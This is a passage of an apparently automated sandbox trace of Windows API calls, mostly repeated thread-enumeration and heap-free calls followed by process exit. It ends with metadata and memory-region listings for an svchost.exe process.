(hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.595] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.596] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.597] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.598] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.599] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.600] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.601] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.602] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.603] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.604] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.605] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.606] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.607] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.608] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.609] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.610] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.611] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.612] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.613] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.614] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.615] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.616] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.617] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.618] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.619] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.620] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.621] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.622] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.623] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.624] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.625] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.626] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.627] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.628] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.789] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.790] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.791] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.792] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.793] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.794] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.795] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.796] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.797] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.798] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.799] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.800] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.801] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.802] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.803] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.804] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.805] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.806] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.807] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.808] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.809] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.810] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.811] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.812] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.813] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.814] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.815] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.816] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.817] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.818] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.819] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.820] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.821] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.822] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.823] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.951] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.952] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.953] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.954] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.955] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.956] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.957] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.958] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.959] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.960] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.961] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.962] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.963] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.964] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.965] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.966] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.967] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.968] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.969] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.970] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.971] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.973] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.974] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.975] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.976] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.977] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0148.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.131] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.287] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.288] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0149.289] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0207.452] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0207.826] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0212.685] FreeLibrary (hLibModule=0x7ffc45e90000) returned 1 [0212.692] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0212.692] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0212.693] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0212.693] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0212.693] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0212.693] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0212.694] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x487b60 | out: hHeap=0x470000) returned 1 [0212.695] RtlInterlockedFlushSList (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) returned 0x0 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b2b0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e500 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e240 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x480c20 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e380 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4744c0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b4f0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x473fb0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b3a0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e4c0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4794a0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x473cb0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4725f0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x473eb0 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x480630 | out: hHeap=0x470000) returned 1 [0212.695] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b550 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x480bd0 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x475660 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x475680 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b3d0 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b400 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e280 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47af20 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b5c0 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474810 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474830 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474070 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e3c0 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47e140 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474090 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b520 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489a90 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47b160 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x489d50 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x47a370 | out: hHeap=0x470000) returned 1 [0212.696] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474b40 | out: hHeap=0x470000) returned 1 [0212.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486950 | out: hHeap=0x470000) returned 1 [0212.698] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0212.698] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x474290 | out: hHeap=0x470000) returned 1 [0212.699] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x486580 | out: hHeap=0x470000) returned 1 [0212.699] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsFree") returned 0x7ffc5c00ca20 [0212.699] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0212.699] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0212.699] FreeLibrary (hLibModule=0x7ffc5bfa0000) returned 1 [0212.699] FreeLibrary (hLibModule=0x7ffc5ecd0000) returned 1 [0212.702] LocalFree (hMem=0x479310) returned 0x0 [0212.703] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0212.703] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff626f50000 [0212.703] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4831e0 | out: hHeap=0x470000) returned 1 [0212.703] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4850f0 | out: hHeap=0x470000) returned 1 [0212.704] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x7ffc5be50000 [0212.704] GetProcAddress (hModule=0x7ffc5be50000, lpProcName="AppPolicyGetProcessTerminationMethod") returned 0x0 [0213.028] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14fe98 | out: phModule=0x14fe98) returned 0 [0213.028] ExitProcess (uExitCode=0x0) [0213.029] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x483b10 | out: hHeap=0x470000) returned 1 Thread: id = 44 os_tid = 0x1174 Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x75fd1000" os_pid = "0x344" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x214" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a36c" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1457 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1458 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1459 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1460 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1461 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1462 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1463 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1464 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1465 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1466 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1467 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1468 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1469 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1470 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1471 start_va = 0x500000 end_va = 0x500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1472 start_va = 0x510000 end_va = 0x510fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1473 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1474 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 1475 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1476 start_va = 0x550000 end_va = 0x551fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "dosvc.dll.mui" filename = "\\Windows\\System32\\en-US\\dosvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\dosvc.dll.mui") Region: id = 1477 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" 